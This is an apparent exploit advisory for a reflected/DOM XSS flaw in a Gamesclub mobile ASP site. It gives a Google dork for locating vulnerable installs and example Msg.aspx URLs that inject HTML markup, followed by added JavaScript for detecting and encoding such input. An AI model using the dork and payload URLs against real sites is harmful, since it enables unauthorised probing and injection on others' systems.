Gamesclub Mobile Service over WAP/GPRS Cross Site Scripting DOM Based XSS Vulnerability
<HTML><HEAD><TITLE>Gamesclub Mobile Service over WAP/GPRS Cross Site Scripting (DOM Based XSS) Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>
# Exploit Title : Gamesclub Mobile Service over WAP/GPRS Cross Site Scripting (DOM Based XSS) Vulnerability
# Application Name : Gamesclub Mobile Service over WAP/GPRS
# Exploit Author : (Revlution Security)
# Author Contact : localhost097@gmail.com
# Vulnerable Type : Cross Site Scripting
# Platform : ASP
# Date : 11/6/2016
# Google Dork: inurl:Default.aspx intext:gamesclub inurl:/Arabic/ intext:gamesclub inurl:/html5/ intext:gamesclub
# Example:
gamesclub.example/html5/Arabic/Msg.aspx?msg=<html>omer was here<html/>
gamesclub.example/Arabic/Msg.aspx?msg=<html>omer<html/>
gamesclub.example/html5/Msg.aspx?msg=<html>omer<html/>
gamesclub.example/Feature/Msg.aspx?msg=<html>omer<html/>
gamesclub.example/Portal/Msg.aspx?msg=<html>omer<html/>
gamesclub.example/HTML5/Msg.aspx?msg=<html>omer<html/>
gamesclub.example/LWP/Msg.aspx?msg=
</BODY></HTML>
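One way to triage and neutralise the `msg` reflection described above, as an added example that is not part of the original advisory or the vendor's code: it flags requests to `Msg.aspx` whose `msg` value decodes to tag-like markup, and produces the HTML-encoded form a corrected page would emit. The function names, the tag-like pattern and the sample request targets are assumptions constructed here, and the code assumes the page echoes `msg` into HTML.

```javascript
// Added example: log triage and output encoding for the `msg` parameter.
// Assumption: the page echoes `msg` into HTML; all names below are hypothetical.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode text for an HTML element context (in a browser, prefer textContent).
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Percent-decode repeatedly (bounded) so double-encoded markup is still seen.
function fullyDecode(value, maxRounds = 3) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(current); } catch { break; }
    if (next === current) break;
    current = next;
  }
  return current;
}

const TAG_LIKE = /<\/?[a-z!]/i; // start of an element, closing tag or comment

// Returns details for a Msg.aspx request whose msg carries markup, else null.
function flagRequest(requestTarget) {
  const url = new URL(requestTarget, 'http://placeholder.invalid');
  if (!/\/msg\.aspx$/i.test(url.pathname)) return null;
  for (const [key, value] of url.searchParams) {
    if (key.toLowerCase() !== 'msg') continue; // ASP.NET query keys are case-insensitive
    const decoded = fullyDecode(value);
    if (TAG_LIKE.test(decoded)) {
      return { path: url.pathname, msg: decoded, encoded: escapeHtml(decoded) };
    }
  }
  return null;
}

// Constructed request targets (not real traffic), using paths from the advisory.
const sampleTargets = [
  '/Arabic/Msg.aspx?msg=<html>omer<html/>',
  '/html5/Msg.aspx?msg=%253Chtml%253Eomer',
  '/GC/wap/msg.aspx?MSG=Subscription+successful',
];
for (const target of sampleTargets) {
  const hit = flagRequest(target);
  console.log(hit ? `FLAG ${hit.path} -> ${hit.encoded}` : `ok   ${target}`);
}
```

The pattern only covers markup in element context; if `msg` is written into an attribute or a script block, the encoding and the detection rule both need to match that context.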